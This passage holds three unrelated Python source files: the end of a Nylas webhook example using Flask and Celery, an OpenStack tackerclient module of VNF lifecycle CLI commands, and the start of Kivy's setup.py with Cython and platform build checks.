# onto the Celery task queue, to handle it later. That way,
# we've got the data saved, and we can return a response to the
# Nylas webhook notification right now.
process_delta.delay(delta)
# Now that all the `process_delta` tasks have been queued, we can
# return an HTTP response to Nylas, to let them know that we processed
# the webhook notification successfully.
return "Deltas have been queued", 200
def verify_signature(message, key, signature):
"""
This function will verify the authenticity of a digital signature.
For security purposes, Nylas includes a digital signature in the headers
of every webhook notification, so that clients can verify that the
webhook request came from Nylas and no one else. The signing key
is your OAuth client secret, which only you and Nylas know.
"""
digest = hmac.new(key, msg=message, digestmod=hashlib.sha256).hexdigest()
return hmac.compare_digest(digest, signature)
@celery.task
def process_delta(delta):
"""
This is the part of the code where you would process the information
from the webhook notification. Each delta is one change that happened,
and might require fetching message IDs, updating your database,
and so on.
However, because this is just an example project, we'll just print
out information about the notification, so you can see what
information is being sent.
"""
kwargs = {
"type": delta["type"],
"date": datetime.datetime.utcfromtimestamp(delta["date"]),
"object_id": delta["object_data"]["id"],
}
print(" * {type} at {date} with ID {object_id}".format(**kwargs))
@app.route("/")
def index():
"""
This makes sure that when you visit the root of the website,
you get a webpage rather than a 404 error.
"""
return render_template("index.html", ngrok_url=ngrok_url())
def ngrok_url():
"""
If ngrok is running, it exposes an API on port 4040. We can use that
to figure out what URL it has assigned, and suggest that to the user.
https://ngrok.com/docs#list-tunnels
"""
try:
ngrok_resp = requests.get("http://localhost:4040/api/tunnels")
except requests.ConnectionError:
# I guess ngrok isn't running.
return None
ngrok_data = ngrok_resp.json()
secure_urls = [
tunnel["public_url"]
for tunnel in ngrok_data["tunnels"]
if tunnel["proto"] == "https"
]
return secure_urls[0]
# When this file is executed, this block of code will run.
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "--worker":
# Run the celery worker, *instead* of running the Flask web server.
celery.worker_main(sys.argv[1:])
sys.exit()
# If we get here, we're going to try to run the Flask web server.
url = ngrok_url()
if not url:
print(
"Looks like ngrok isn't running! Start it by running "
"`ngrok http 5000` in a different terminal window, "
"and then try running this example again.",
file=sys.stderr,
)
sys.exit(1)
print(" * Webhook URL: {url}/webhook".format(url=url))
if app.config.get("CELERY_TASK_ALWAYS_EAGER"):
print(" * Celery tasks will be run synchronously. No worker needed.")
elif len(celery.control.inspect().stats().keys()) < 2:
print(
" * You need to run at least one Celery worker, otherwise "
"the webhook notifications will never be processed.\n"
" To do so, run `{arg0} --worker` in a different "
"terminal window.".format(arg0=sys.argv[0])
)
app.run()
|
|
# Copyright (C) 2020 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
import os
import time
from osc_lib.command import command
from osc_lib import utils
from tackerclient.common import exceptions
from tackerclient.i18n import _
from tackerclient.osc import sdk_utils
from tackerclient.osc import utils as tacker_osc_utils
_attr_map = (
('id', 'ID', tacker_osc_utils.LIST_BOTH),
('vnfInstanceName', 'VNF Instance Name', tacker_osc_utils.LIST_BOTH),
('instantiationState', 'Instantiation State', tacker_osc_utils.LIST_BOTH),
('vnfProvider', 'VNF Provider', tacker_osc_utils.LIST_BOTH),
('vnfSoftwareVersion', 'VNF Software Version', tacker_osc_utils.LIST_BOTH),
('vnfProductName', 'VNF Product Name', tacker_osc_utils.LIST_BOTH),
('vnfdId', 'VNFD ID', tacker_osc_utils.LIST_BOTH)
)
LOG = logging.getLogger(__name__)
_mixed_case_fields = ('vnfInstanceName', 'vnfInstanceDescription', 'vnfdId',
'vnfProvider', 'vnfProductName', 'vnfSoftwareVersion',
'vnfdVersion', 'instantiationState',
'vimConnectionInfo', 'instantiatedVnfInfo')
_VNF_INSTANCE = 'vnf_instance'
VNF_INSTANCE_TERMINATION_TIMEOUT = 300
EXTRA_WAITING_TIME = 10
SLEEP_TIME = 1
formatters = {'vimConnectionInfo': tacker_osc_utils.FormatComplexDataColumn,
'instantiatedVnfInfo': tacker_osc_utils.FormatComplexDataColumn,
'_links': tacker_osc_utils.FormatComplexDataColumn}
def _get_columns(vnflcm_obj, action=None):
column_map = {
'id': 'ID',
'vnfInstanceName': 'VNF Instance Name',
'vnfInstanceDescription': 'VNF Instance Description',
'vnfdId': 'VNFD ID',
'vnfProvider': 'VNF Provider',
'vnfProductName': 'VNF Product Name',
'vnfSoftwareVersion': 'VNF Software Version',
'vnfdVersion': 'VNFD Version',
'instantiationState': 'Instantiation State',
'_links': 'Links',
}
if action == 'show':
if vnflcm_obj['instantiationState'] == 'INSTANTIATED':
column_map.update(
{'instantiatedVnfInfo': 'Instantiated Vnf Info'}
)
column_map.update(
{'vimConnectionInfo': 'VIM Connection Info',
'_links': 'Links'}
)
return sdk_utils.get_osc_show_columns_for_sdk_resource(vnflcm_obj,
column_map)
class CreateVnfLcm(command.ShowOne):
_description = _("Create a new VNF Instance")
def get_parser(self, prog_name):
parser = super(CreateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
'vnfd_id',
metavar="<vnfd-id>",
help=_('Identifier that identifies the VNFD which defines the '
'VNF instance to be created.'))
parser.add_argument(
'--name',
metavar="<vnf-instance-name>",
help=_('Name of the VNF instance to be created.'))
parser.add_argument(
'--description',
metavar="<vnf-instance-description>",
help=_('Description of the VNF instance to be created.'))
parser.add_argument(
'--I',
metavar="<param-file>",
help=_("Instantiate VNF subsequently after it's creation. "
"Specify instantiate request parameters in a json file."))
return parser
def args2body(self, parsed_args, file_path=None):
body = {}
if file_path:
return jsonfile2body(file_path)
body['vnfdId'] = parsed_args.vnfd_id
if parsed_args.description:
body['vnfInstanceDescription'] = parsed_args.description
if parsed_args.name:
body['vnfInstanceName'] = parsed_args.name
return body
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
vnf = client.create_vnf_instance(self.args2body(parsed_args))
if parsed_args.I:
# Instantiate VNF instance.
result = client.instantiate_vnf_instance(
vnf['id'],
self.args2body(parsed_args, file_path=parsed_args.I))
if not result:
print((_('VNF Instance %(id)s is created and instantiation'
' request has been accepted.') % {'id': vnf['id']}))
display_columns, columns = _get_columns(vnf)
data = utils.get_item_properties(sdk_utils.DictModel(vnf),
columns, formatters=formatters,
mixed_case_fields=_mixed_case_fields)
return (display_columns, data)
class ShowVnfLcm(command.ShowOne):
_description = _("Display VNF instance details")
def get_parser(self, prog_name):
parser = super(ShowVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to display"))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
obj = client.show_vnf_instance(parsed_args.vnf_instance)
display_columns, columns = _get_columns(obj, action='show')
data = utils.get_item_properties(
sdk_utils.DictModel(obj),
columns, mixed_case_fields=_mixed_case_fields,
formatters=formatters)
return (display_columns, data)
class ListVnfLcm(command.Lister):
_description = _("List VNF Instance")
def get_parser(self, prog_name):
parser = super(ListVnfLcm, self).get_parser(prog_name)
return parser
def take_action(self, parsed_args):
_params = {}
client = self.app.client_manager.tackerclient
vnf_instances = client.list_vnf_instances(**_params)
headers, columns = tacker_osc_utils.get_column_definitions(
_attr_map, long_listing=True)
return (headers,
(utils.get_dict_properties(
s, columns, mixed_case_fields=_mixed_case_fields,
) for s in vnf_instances))
def jsonfile2body(file_path):
if file_path is not None and os.access(file_path, os.R_OK) is False:
msg = _("File %s does not exist or user does not have read "
"privileges to it")
reason = msg % file_path
raise exceptions.InvalidInput(reason=reason)
try:
with open(file_path) as f:
body = json.load(f)
except (IOError, ValueError) as ex:
msg = _("Failed to load parameter file. Error: %s")
reason = msg % ex
raise exceptions.InvalidInput(reason=reason)
if not body:
reason = _('The parameter file is empty')
raise exceptions.InvalidInput(reason=reason)
return body
class InstantiateVnfLcm(command.Command):
_description = _("Instantiate a VNF Instance")
def get_parser(self, prog_name):
parser = super(InstantiateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to instantiate"))
parser.add_argument(
'instantiation_request_file',
metavar="<param-file>",
help=_('Specify instantiate request parameters in a json file.'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
result = client.instantiate_vnf_instance(
parsed_args.vnf_instance, jsonfile2body(
parsed_args.instantiation_request_file))
if not result:
print((_('Instantiate request for VNF Instance %(id)s has been'
' accepted.') % {'id': parsed_args.vnf_instance}))
class HealVnfLcm(command.Command):
_description = _("Heal VNF Instance")
def get_parser(self, prog_name):
parser = super(HealVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to heal"))
parser.add_argument(
'--cause',
help=_('Specify the reason why a healing procedure is required.'))
parser.add_argument(
'--vnfc-instance',
metavar="<vnfc-instance-id>",
nargs="+",
help=_("List of VNFC instances requiring a healing action.")
)
return parser
def args2body(self, parsed_args):
body = {}
if parsed_args.cause:
body['cause'] = parsed_args.cause
if parsed_args.vnfc_instance:
body['vnfcInstanceId'] = parsed_args.vnfc_instance
return body
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
result = client.heal_vnf_instance(
parsed_args.vnf_instance, self.args2body(parsed_args))
if not result:
print((_('Heal request for VNF Instance %(id)s has been'
' accepted.') % {'id': parsed_args.vnf_instance}))
class TerminateVnfLcm(command.Command):
_description = _("Terminate a VNF instance")
def get_parser(self, prog_name):
parser = super(TerminateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to terminate"))
parser.add_argument(
"--termination-type",
default='GRACEFUL',
metavar="<termination-type>",
choices=['GRACEFUL', 'FORCEFUL'],
help=_("Termination type can be 'GRACEFUL' or 'FORCEFUL'. "
"Default is 'GRACEFUL'"))
parser.add_argument(
'--graceful-termination-timeout',
metavar="<graceful-termination-timeout>",
type=int,
help=_('This attribute is only applicable in case of graceful '
'termination. It defines the time to wait for the VNF to be'
' taken out of service before shutting down the VNF and '
'releasing the resources. The unit is seconds.'))
parser.add_argument(
'--D',
action='store_true',
default=False,
help=_("Delete VNF Instance subsequently after it's termination"),
)
return parser
def args2body(self, parsed_args):
body = {}
body['terminationType'] = parsed_args.termination_type
if parsed_args.graceful_termination_timeout:
if parsed_args.termination_type == 'FORCEFUL':
exceptions.InvalidInput(reason='--graceful-termination-timeout'
' argument is invalid for "FORCEFUL"'
' termination')
body['gracefulTerminationTimeout'] = parsed_args.\
graceful_termination_timeout
return body
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
result = client.terminate_vnf_instance(parsed_args.vnf_instance,
self.args2body(parsed_args))
if not result:
print(_("Terminate request for VNF Instance '%(id)s' has been"
" accepted.") % {'id': parsed_args.vnf_instance})
if parsed_args.D:
print(_("Waiting for vnf instance to be terminated before "
"deleting"))
self._wait_until_vnf_is_terminated(
client, parsed_args.vnf_instance,
graceful_timeout=parsed_args.graceful_termination_timeout)
result = client.delete_vnf_instance(parsed_args.vnf_instance)
if not result:
print(_("VNF Instance '%(id)s' deleted successfully") %
{'id': parsed_args.vnf_instance})
def _wait_until_vnf_is_terminated(self, client, vnf_instance_id,
graceful_timeout=None):
# wait until vnf instance 'instantiationState' is set to
# 'NOT_INSTANTIATED'
if graceful_timeout:
# If graceful_termination_timeout is provided,
# terminate vnf will start after this timeout period.
# Hence, it should wait for extra time of 10 seconds
# after this graceful_termination_timeout period.
timeout = graceful_timeout + EXTRA_WAITING_TIME
else:
timeout = VNF_INSTANCE_TERMINATION_TIMEOUT
start_time = int(time.time())
while True:
vnf_instance = client.show_vnf_instance(vnf_instance_id)
if vnf_instance['instantiationState'] == 'NOT_INSTANTIATED':
break
if ((int(time.time()) - start_time) > timeout):
msg = _("Couldn't verify vnf instance is terminated within "
"'%(timeout)s' seconds. Unable to delete vnf instance "
"%(id)s")
raise exceptions.CommandError(
message=msg % {'timeout': timeout, 'id': vnf_instance_id})
time.sleep(SLEEP_TIME)
class DeleteVnfLcm(command.Command):
"""Vnf lcm delete
DeleteVnfLcm class supports bulk deletion of vnf instances, and error
handling.
"""
_description = _("Delete VNF Instance(s)")
def get_parser(self, prog_name):
parser = super(DeleteVnfLcm, self).get_parser(prog_name)
parser.add_argument(
'vnf_instances',
metavar="<vnf-instance>",
nargs="+",
help=_("VNF instance ID(s) to delete"))
return parser
def take_action(self, parsed_args):
error_count = 0
client = self.app.client_manager.tackerclient
vnf_instances = parsed_args.vnf_instances
for vnf_instance in vnf_instances:
try:
client.delete_vnf_instance(vnf_instance)
except Exception as e:
error_count += 1
LOG.error(_("Failed to delete vnf instance with "
"ID '%(vnf)s': %(e)s"),
{'vnf': vnf_instance, 'e': e})
total = len(vnf_instances)
if (error_count > 0):
msg = (_("Failed to delete %(error_count)s of %(total)s "
"vnf instances.") % {'error_count': error_count,
'total': total})
raise exceptions.CommandError(message=msg)
else:
if total > 1:
print(_('All specified vnf instances are deleted '
'successfully'))
else:
print(_("Vnf instance '%s' deleted "
"successfully") % vnf_instances[0])
class UpdateVnfLcm(command.Command):
_description = _("Update VNF Instance")
def get_parser(self, prog_name):
"""Add arguments to parser.
Args:
prog_name ([string]): program name
Returns:
parser([ArgumentParser]): [description]
"""
parser = super(UpdateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_('VNF instance ID to update.'))
parser.add_argument(
'--I',
metavar="<param-file>",
help=_("Specify update request parameters in a json file."))
return parser
def args2body(self, file_path=None):
"""Call jsonfile2body to store request body to body(dict)
Args:
file_path ([string], optional): file path of param file(json).
Defaults to None.
Returns:
body ([dict]): Request body is stored
"""
body = {}
if file_path:
return jsonfile2body(file_path)
return body
def take_action(self, parsed_args):
"""Execute update_vnf_instance and output result comment
Args:
parsed_args ([Namespace]): [description]
"""
client = self.app.client_manager.tackerclient
if parsed_args.I:
# Update VNF instance.
result = client.update_vnf_instance(
parsed_args.vnf_instance,
self.args2body(file_path=parsed_args.I))
if not result:
print((_('Update vnf:%(id)s ') %
{'id': parsed_args.vnf_instance}))
class ScaleVnfLcm(command.Command):
_description = _("Scale a VNF Instance")
def get_parser(self, prog_name):
parser = super(ScaleVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_('VNF instance ID to scale'))
parser.add_argument(
'--number-of-steps',
metavar="<number-of-steps>",
type=int,
help=_("Number of scaling steps to be executed as part of "
"this Scale VNF operation."))
parser.add_argument(
'--additional-param-file',
metavar="<additional-param-file>",
help=_("Additional parameters passed by the NFVO as input "
"to the scaling process."))
scale_require_parameters = parser.add_argument_group(
"require arguments"
)
scale_require_parameters.add_argument(
'--type',
metavar="<type>",
required=True,
choices=['SCALE_OUT', 'SCALE_IN'],
help=_("SCALE_OUT or SCALE_IN for type of scale operation."))
scale_require_parameters.add_argument(
'--aspect-id',
required=True,
metavar="<aspect-id>",
help=_("Identifier of the scaling aspect."))
return parser
def args2body(self, parsed_args):
"""To store request body, call jsonfile2body.
Args:
parsed_args ([Namespace]): arguments of CLI.
Returns:
body ([dict]): Request body is stored
"""
body = {'type': parsed_args.type, 'aspectId': parsed_args.aspect_id}
if parsed_args.number_of_steps:
body['numberOfSteps'] = parsed_args.number_of_steps
if parsed_args.additional_param_file:
body.update(jsonfile2body(parsed_args.additional_param_file))
return body
def take_action(self, parsed_args):
"""Execute scale_vnf_instance and output result comment.
Args:
parsed_args ([Namespace]): arguments of CLI.
"""
client = self.app.client_manager.tackerclient
result = client.scale_vnf_instance(
parsed_args.vnf_instance,
self.args2body(parsed_args))
if not result:
print((_('Scale request for VNF Instance %s has been accepted.')
% parsed_args.vnf_instance))
|
|
#
# Kivy - Cross-platform UI framework
# https://kivy.org/
#
from __future__ import print_function
import sys
build_examples = False
if "--build_examples" in sys.argv:
build_examples = True
sys.argv.remove("--build_examples")
from copy import deepcopy
import os
from os.path import join, dirname, sep, exists, basename, isdir
from os import walk, environ
from distutils.version import LooseVersion
from distutils.sysconfig import get_python_inc
from collections import OrderedDict
from time import sleep
from subprocess import check_output, CalledProcessError
from datetime import datetime
if environ.get('KIVY_USE_SETUPTOOLS'):
from setuptools import setup, Extension
print('Using setuptools')
else:
from distutils.core import setup
from distutils.extension import Extension
print('Using distutils')
PY3 = sys.version > '3'
if PY3: # fix error with py3's LooseVersion comparisons
def ver_equal(self, other):
return self.version == other
LooseVersion.__eq__ = ver_equal
def get_version(filename='kivy/version.py'):
VERSION = kivy.__version__
DATE = datetime.utcnow().strftime('%Y%m%d')
try:
GIT_REVISION = check_output(
['git', 'rev-parse', 'HEAD']
).strip().decode('ascii')
except CalledProcessError:
GIT_REVISION = "Unknown"
cnt = (
"# THIS FILE IS GENERATED FROM KIVY SETUP.PY\n"
"__version__ = '%(version)s'\n"
"__hash__ = '%(hash)s'\n"
"__date__ = '%(date)s'\n"
)
with open(filename, 'w') as f:
f.write(cnt % {
'version': VERSION,
'hash': GIT_REVISION,
'date': DATE
})
return VERSION
MIN_CYTHON_STRING = '0.23'
MIN_CYTHON_VERSION = LooseVersion(MIN_CYTHON_STRING)
MAX_CYTHON_STRING = '0.23'
MAX_CYTHON_VERSION = LooseVersion(MAX_CYTHON_STRING)
CYTHON_UNSUPPORTED = ()
def getoutput(cmd, env=None):
import subprocess
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
p.wait()
if p.returncode: # if not returncode == 0
print('WARNING: A problem occurred while running {0} (code {1})\n'
.format(cmd, p.returncode))
stderr_content = p.stderr.read()
if stderr_content:
print('{0}\n'.format(stderr_content))
return ""
return p.stdout.read()
def pkgconfig(*packages, **kw):
flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
lenviron = None
pconfig = join(sys.prefix, 'libs', 'pkgconfig')
if isdir(pconfig):
lenviron = environ.copy()
lenviron['PKG_CONFIG_PATH'] = '{};{}'.format(
environ.get('PKG_CONFIG_PATH', ''), pconfig)
cmd = 'pkg-config --libs --cflags {}'.format(' '.join(packages))
results = getoutput(cmd, lenviron).split()
for token in results:
ext = token[:2].decode('utf-8')
flag = flag_map.get(ext)
if not flag:
continue
kw.setdefault(flag, []).append(token[2:].decode('utf-8'))
return kw
# -----------------------------------------------------------------------------
# Determine on which platform we are
platform = sys.platform
# Detect 32/64bit for OSX (http://stackoverflow.com/a/1405971/798575)
if sys.platform == 'darwin':
if sys.maxsize > 2 ** 32:
osx_arch = 'x86_64'
else:
osx_arch = 'i386'
# Detect Python for android project (http://github.com/kivy/python-for-android)
ndkplatform = environ.get('NDKPLATFORM')
if ndkplatform is not None and environ.get('LIBLINK'):
platform = 'android'
kivy_ios_root = environ.get('KIVYIOSROOT', None)
if kivy_ios_root is not None:
platform = 'ios'
if exists('/opt/vc/include/bcm_host.h'):
platform = 'rpi'
if exists('/usr/lib/arm-linux-gnueabihf/libMali.so'):
platform = 'mali'
# -----------------------------------------------------------------------------
# Detect options
#
c_options = OrderedDict()
c_options['use_rpi'] = platform == 'rpi'
c_options['use_mali'] = platform == 'mali'
c_options['use_egl'] = False
c_options['use_opengl_es2'] = None
c_options['use_opengl_mock'] = environ.get('READTHEDOCS', None) == 'True'
c_options['use_sdl2'] = None
c_options['use_ios'] = False
c_options['use_mesagl'] = False
c_options['use_x11'] = False
c_options['use_gstreamer'] = None
c_options['use_avfoundation'] = platform == 'darwin'
c_options['use_osx_frameworks'] = platform == 'darwin'
c_options['debug_gl'] = False
# now check if environ is changing the default values
for key in list(c_options.keys()):
ukey = key.upper()
if ukey in environ:
value = bool(int(environ[ukey]))
print('Environ change {0} -> {1}'.format(key, value))
c_options[key] = value
# -----------------------------------------------------------------------------
# Cython check
# on python-for-android and kivy-ios, cython usage is external
cython_unsupported_append = '''
Please note that the following versions of Cython are not supported
at all: {}
'''.format(', '.join(map(str, CYTHON_UNSUPPORTED)))
cython_min = '''\
This version of Cython is not compatible with Kivy. Please upgrade to
at least version {0}, preferably the newest supported version {1}.
If your platform provides a Cython package, make sure you have upgraded
to the newest version. If the newest version available is still too low,
please remove it and install the newest supported Cython via pip:
pip install -I Cython=={1}{2}\
'''.format(MIN_CYTHON_STRING, MAX_CYTHON_STRING,
cython_unsupported_append if CYTHON_UNSUPPORTED else '')
cython_max = '''\
This version of Cython is untested with Kivy. While this version may
work perfectly fine, it is possible that you may experience issues. If
you do have issues, please downgrade to a supported version. It is
best to use the newest supported version, {1}, but the minimum
supported version is {0}.
If your platform provides a Cython package, check if you can downgrade
to a supported version. Otherwise, uninstall the platform package and
install Cython via pip:
pip install -I Cython=={1}{2}\
'''.format(MIN_CYTHON_STRING, MAX_CYTHON_STRING,
cython_unsupported_append if CYTHON_UNSUPPORTED else '')
cython_unsupported = '''\
This version of Cython suffers from known bugs and is unsupported.
Please install the newest supported version, {1}, if possible, but
the minimum supported version is {0}.
If your platform provides a Cython package, check if you can install
a supported version. Otherwise, uninstall the platform package and
install Cython via pip:
pip install -I Cython=={1}{2}\
'''.format(MIN_CYTHON_STRING, MAX_CYTHON_STRING,
cython_unsupported_append)
have_cython = False
skip_cython = False
if platform in ('ios', 'android'):
print('\nCython check avoided.')
skip_cython = True
else:
try:
# check for cython
from Cython.Distutils import build_ext
have_cython = True
import Cython
cy_version_str = Cython.__version__
cy_ver = LooseVersion(cy_version_str)
print('\nDetected Cython version {}'.format(cy_version_str))
if cy_ver < MIN_CYTHON_VERSION:
print(cython_min)
raise ImportError('Incompatible Cython Version')
if cy_ver in CYTHON_UNSUPPORTED:
print(cython_unsupported)
raise ImportError('Incompatible Cython Version')
if cy_ver > MAX_CYTHON_VERSION:
print(cython_max)
sleep(1)
except ImportError:
print("\nCython is missing, it's required for compiling kivy !\n\n")
raise
if not have_cython:
from distutils.command.build_ext import build_ext
# -----------------------------------------------------------------------------
# Setup classes
# the build path where kivy is being compiled
src_path = build_path = dirname(__file__)
class KivyBuildExt(build_ext):
def finalize_options(self):
retval = build_ext.finalize_options(self)
global build_path
if (self.build_lib is not None and exists(self.build_lib) and
not self.inplace):
build_path = self.build_lib
return retval
def build_extensions(self):
# build files
config_h_fn = ('include', 'config.h')
config_pxi_fn = ('include', 'config.pxi')
config_py_fn = ('setupconfig.py', )
# generate headers
config_h = '// Autogenerated file for Kivy C configuration\n'
config_h += '#define __PY3 {0}\n'.format(int(PY3))
config_pxi = '# Autogenerated file for Kivy Cython configuration\n'
config_pxi += 'DEF PY3 = {0}\n'.format(int(PY3))
config_py = '# Autogenerated file for Kivy configuration\n'
config_py += 'PY3 = {0}\n'.format(int(PY3))
config_py += 'CYTHON_MIN = {0}\nCYTHON_MAX = {1}\n'.format(
repr(MIN_CYTHON_STRING), repr(MAX_CYTHON_STRING))
config_py += 'CYTHON_BAD = {0}\n'.format(repr(', '.join(map(
str, CYTHON_UNSUPPORTED))))
# generate content
print('Build configuration is:')
for opt, value in c_options.items():
value = int(bool(value))
print(' * {0} = {1}'.format(opt, value))
opt = opt.upper()
config_h += '#define __{0} {1}\n'.format(opt, value)
config_pxi += 'DEF {0} = {1}\n'.format(opt, value)
config_py += '{0} = {1}\n'.format(opt, value)
debug = bool(self.debug)
print(' * debug = {0}'.format(debug))
config_pxi += 'DEF DEBUG = {0}\n'.format(debug)
config_py += 'DEBUG = {0}\n'.format(debug)
config_pxi += 'DEF PLATFORM = "{0}"\n'.format(platform)
config_py += 'PLATFORM = "{0}"\n'.format(platform)
for fn, content in (
(config_h_fn, config_h), (config_pxi_fn, config_pxi),
(config_py_fn, config_py)):
build_fn = expand(build_path, *fn)
if self.update_if_changed(build_fn, content):
print('Updated {}'.format(build_fn))
src_fn = expand(src_path, *fn)
if src_fn != build_fn and self.update_if_changed(src_fn, content):
print('Updated {}'.format(src_fn))
c = self.compiler.compiler_type
print('Detected compiler is {}'.format(c))
if c != 'msvc':
for e in self.extensions:
e.extra_link_args += ['-lm']
build_ext.build_extensions(self)
def update_if_changed(self, fn, content):
need_update = True
if exists(fn):
with open(fn) as fd:
need_update = fd.read() != content
if need_update:
with open(fn, 'w') as fd:
fd.write(content)
return need_update
def _check_and_fix_sdl2_mixer(f_path):
print("Check if SDL2_mixer smpeg2 have an @executable_path")
rpath_from = ("@executable_path/../Frameworks/SDL2.framework"
"/Versions/A/SDL2")
rpath_to = "@rpath/../../../../SDL2.framework/Versions/A/SDL2"
smpeg2_path = ("{}/Versions/A/Frameworks/smpeg2.framework"
"/Versions/A/smpeg2").format(f_path)
output = getoutput(("otool -L '{}'").format(smpeg2_path)).decode('utf-8')
if "@executable_path" not in output:
return
print("WARNING: Your SDL2_mixer version is invalid")
print("WARNING: The smpeg2 framework embedded in SDL2_mixer contains a")
print("WARNING: reference to @executable_path that will fail the")
print("WARNING: execution of your application.")
print("WARNING: We are going to change:")
print("WARNING: from: {}".format(rpath_from))
print("WARNING: to: {}".format(rpath_to))
getoutput("install_name_tool -change {} {} {}".format(
rpath_from, rpath_to, smpeg2_path))
output = getoutput(("otool -L '{}'").format(smpeg2_path))
if b"@executable_path" not in output:
print("WARNING: Change successfully applied!")
print("WARNING: You'll never see this message again.")
else:
print("WARNING: Unable to apply the changes, sorry.")
# -----------------------------------------------------------------------------
# extract version (simulate doc generation, kivy will be not imported)
environ['KIVY_DOC_INCLUDE'] = '1'
import kivy
# extra build commands go in the cmdclass dict {'command-name': CommandClass}
# see tools.packaging.{platform}.build.py for custom build commands for
# portable packages. Also e.g. we use build_ext command from cython if its
# installed for c extensions.
from kivy.tools.packaging.factory import FactoryBuild
cmdclass = {
'build_factory': FactoryBuild,
'build_ext': KivyBuildExt}
try:
# add build rules for portable packages to cmdclass
if platform == 'win32':
from kivy.tools.packaging.win32.build import WindowsPortableBuild
cmdclass['build_portable'] = WindowsPortableBuild
elif platform == 'darwin':
from kivy.tools.packaging.osx.build import OSXPortableBuild
cmdclass['build_portable'] = OSXPortableBuild
except ImportError:
print('User distribution detected, avoid portable command.')
# Detect which opengl version headers to use
if platform in ('android', 'darwin', 'ios', 'rpi', 'mali'):
c_options['use_opengl_es2'] = True
elif c_options['use_opengl_es2'] is None:
c_options['use_opengl_es2'] = \
environ.get('KIVY_GRAPHICS', '').lower() == 'gles'
print('Using this graphics system: {}'.format(
['OpenGL', 'OpenGL ES 2'][int(c_options['use_opengl_es2'] or False)]))
# check if we are in a kivy-ios build
if platform == 'ios':
print('Kivy-IOS project environment detect, use it.')
print('Kivy-IOS project located at {0}'.format(kivy_ios_root))
c_options['use_ios'] = True
c_options['use_sdl2'] = True
elif platform == 'darwin':
if c_options['use_osx_frameworks']:
if osx_arch == "i386":
print("Warning: building with frameworks fail on i386")
else:
print("OSX framework used, force to x86_64 only")
environ["ARCHFLAGS"] = environ.get("ARCHFLAGS", "-arch x86_64")
print("OSX ARCHFLAGS are: {}".format(environ["ARCHFLAGS"]))
# detect gstreamer, only on desktop
# works if we forced the options or in autodetection
if platform not in ('ios', 'android') and (c_options['use_gstreamer']
in (None, True)):
if c_options['use_osx_frameworks'] and platform == 'darwin':
# check the existence of frameworks
f_path = '/Library/Frameworks/GStreamer.framework'
if not exists(f_path):
c_options['use_gstreamer'] = False
print('Missing GStreamer framework {}'.format(f_path))
else:
c_options['use_gstreamer'] = True
gst_flags = {
'extra_link_args': [
'-F/Library/Frameworks',
'-Xlinker', '-rpath',
'-Xlinker', '/Library/Frameworks',
'-Xlinker', '-headerpad',
'-Xlinker', '190',
'-framework', 'GStreamer'],
'include_dirs': [join(f_path, 'Headers')]}
else:
# use pkg-config approach instead
gst_flags = pkgconfig('gstreamer-1.0')
if 'libraries' in gst_flags:
c_options['use_gstreamer'] = True
# detect SDL2, only on desktop and iOS, or android if explicitly enabled
# works if we forced the options or in autodetection
sdl2_flags = {}
if c_options['use_sdl2'] or (
platform not in ('android',) and c_options['use_sdl2'] is None):
if c_options['use_osx_frameworks'] and platform == 'darwin':
# check the existence of frameworks
sdl2_valid = True
sdl2_flags = {
'extra_link_args': [
'-F/Library/Frameworks',
'-Xlinker', '-rpath',
'-Xlinker', '/Library/Frameworks',
'-Xlinker', '-headerpad',
'-Xlinker', '190'],
'include_dirs': [],
'extra_compile_args': ['-F/Library/Frameworks']
}
for name in ('SDL2', 'SDL2_ttf', 'SDL2_image', 'SDL2_mixer'):
f_path = '/Library/Frameworks/{}.framework'.format(name)
if not exists(f_path):
print('Missing framework {}'.format(f_path))
sdl2_valid = False
continue
sdl2_flags['extra_link_args'] += ['-framework', name]
sdl2_flags['include_dirs'] += [join(f_path, 'Headers')]
print('Found sdl2 frameworks: {}'.format(f_path))
if name == 'SDL2_mixer':
_check_and_fix_sdl2_mixer(f_path)
if not sdl2_valid:
c_options['use_sdl2'] = False
print('Deactivate SDL2 compilation due to missing frameworks')
else:
c_options['use_sdl2'] = True
print('Activate SDL2 compilation')
elif platform != "ios":
# use pkg-config approach instead
sdl2_flags = pkgconfig('sdl2', 'SDL2_ttf', 'SDL2_image', 'SDL2_mixer')
if 'libraries' in sdl2_flags:
c_options['use_sdl2'] = True
# -----------------------------------------------------------------------------
# declare flags
def get_modulename_from_file(filename):
filename = filename.replace(sep, '/')
pyx = '.'.join(filename.split('.')[:-1])
pyxl = pyx.split('/')
while pyxl[0] != 'kivy':
pyxl.pop(0)
if pyxl[1] == 'kivy':
pyxl.pop(0)
return '.'.join(pyxl)
def expand(root, *args):
return join(root, 'kivy', *args)
class CythonExtension(Extension):
def __init__(self, *args, **kwargs):
Extension.__init__(self, *args, **kwargs)
self.cython_directives = {
